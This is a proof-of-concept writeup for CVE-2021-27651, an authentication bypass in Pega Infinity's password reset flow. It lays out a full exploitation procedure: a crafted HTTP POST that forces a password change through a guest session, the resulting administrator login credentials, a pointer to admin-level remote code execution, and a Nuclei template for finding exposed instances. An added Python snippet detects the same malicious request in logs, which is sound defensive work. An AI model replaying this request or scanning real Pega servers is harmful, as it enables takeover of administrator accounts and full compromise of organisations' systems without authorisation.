
CVE-2021-27651 PoC — PEGA Pega Infinity authorization vulnerability

Associated Vulnerability
Title: PEGA Pega Infinity authorization vulnerability (CVE-2021-27651)
Description: In versions 8.2.1 through 8.5.2 of Pega Infinity, the password reset functionality for local accounts can be used to bypass local authentication checks.
Description: Bypass all stages of the password reset flow.
Readme
## Summary
An attacker can bypass all stages of the password reset flow and reset any user's account on Pega Infinity. This is done by (1) initiating the password reset flow and entering the victim's email, then (2) forcing the HTTP POST request that updates the password through. An attacker could then log in using the newly modified account and fully compromise the Pega instance via the many post-auth code execution vectors available to an administrator (modifying dynamic pages, templating, etc.).

## Steps to Reproduce
1. Browse to the login page of any Pega instance
2. Click "reset password"
3. Type in "administrator@pega.com", proxy the HTTP request, send the HTTP request containing "administrator@pega.com" to the Burp Repeater tab (or any similar tool), then allow the request to go through by disabling the proxy or clicking "send"
4. After allowing the initial request to go through, modify the HTTP request body in the Repeater so it includes the following data (`:PEGA_ID` is a unique ID for each site, in this format: `ZOgwf2Zk3OsEg_oG74MXXxG2bXKbv56W`)...

```
POST /prweb/PRServlet/app/default/:PEGA_ID*/!STANDARD HTTP/1.1
Host: redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Origin: https://redacted.com
DNT: 1
Connection: close
Referer: https://redacted.com/prweb/PRServlet/app/default/:PEGA_ID*/!STANDARD
Cookie: yourCookie
Upgrade-Insecure-Requests: 1

pzAuth=guest&NewPassword=Rules%401234&ConfPassword=Rules%401234&pyActivity%3DCode-Security.pzChangeUserPassword=
```

5. Log in using the following credentials after sending the HTTP request, having bypassed the confirmation step of the password reset and gained access to the administrator account...

```
administrator@pega.com / Rules@1234
```

6. From there, RCE can be achieved via any of the many administrator-only code execution vectors
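As an added detection example (not part of the original PoC), the following Python flags POST requests to the Pega servlet that invoke the change-password activity while carrying the unauthenticated `guest` token, which a legitimate reset flow should never do. It assumes request bodies are available (e.g. from a reverse proxy or WAF log), since standard access logs omit them; all sample records are constructed.

```python
from urllib.parse import parse_qs

# Activity name taken from the PoC request body.
CHANGE_PASSWORD_ACTIVITY = "Code-Security.pzChangeUserPassword"


def is_guest_password_change(method: str, path: str, body: str) -> bool:
    """True when a POST to the Pega servlet invokes the change-password
    activity while the request carries the unauthenticated 'guest' pzAuth."""
    if method.upper() != "POST" or "/prweb/PRServlet" not in path:
        return False
    # keep_blank_values: the PoC passes the activity as a key with an empty
    # value ("pyActivity%3D...=" decodes to the key "pyActivity=Code-Security...").
    params = parse_qs(body, keep_blank_values=True)
    is_guest = "guest" in params.get("pzAuth", [])
    invokes_change = any(
        CHANGE_PASSWORD_ACTIVITY in key
        or any(CHANGE_PASSWORD_ACTIVITY in v for v in values)
        for key, values in params.items()
    )
    return is_guest and invokes_change


def scan(records):
    """Return the indices of (method, path, body) records that match."""
    return [i for i, (m, p, b) in enumerate(records) if is_guest_password_change(m, p, b)]


# Constructed sample records; the first mirrors the PoC body, the PEGA_ID is a placeholder.
SAMPLE_RECORDS = [
    ("POST", "/prweb/PRServlet/app/default/EXAMPLE_PEGA_ID*/!STANDARD",
     "pzAuth=guest&NewPassword=Rules%401234&ConfPassword=Rules%401234"
     "&pyActivity%3DCode-Security.pzChangeUserPassword="),
    ("GET", "/prweb/PRRestService/unauthenticatedAPI/v1/docs", ""),
    # Constructed benign guest request (placeholder activity name, not a real Pega activity).
    ("POST", "/prweb/PRServlet/app/default/EXAMPLE_PEGA_ID*/!STANDARD",
     "pzAuth=guest&UserIdentifier=someone%40example.com&pyActivity=PLACEHOLDER_ACTIVITY"),
]

if __name__ == "__main__":
    for i in scan(SAMPLE_RECORDS):
        print("guest-session password change detected in record", i)
```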

## Affected Versions
Pega Infinity >= 8.2.1
Pega Infinity <= 8.5.2

## Impact
Full compromise of any Pega instance with no prerequisite knowledge.

## Supporting Media
![Password bypass](https://i.imgur.com/kxLRhys.png)
* Password bypass

![Remote code execution via shell upload](https://i.imgur.com/zC8kOfG.png)
* Remote code execution via shell upload

## Nuclei Template
```
id: pega

info:
  name: Pega Infinity Login
  author: sshell
  severity: low

requests:
  - method: GET
    path:
      - "{{BaseURL}}/prweb/PRRestService/unauthenticatedAPI/v1/docs"
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      - type: word
        words:
          - "Pega API"
```

## Credit
Andri Wijayanti (@andridev_)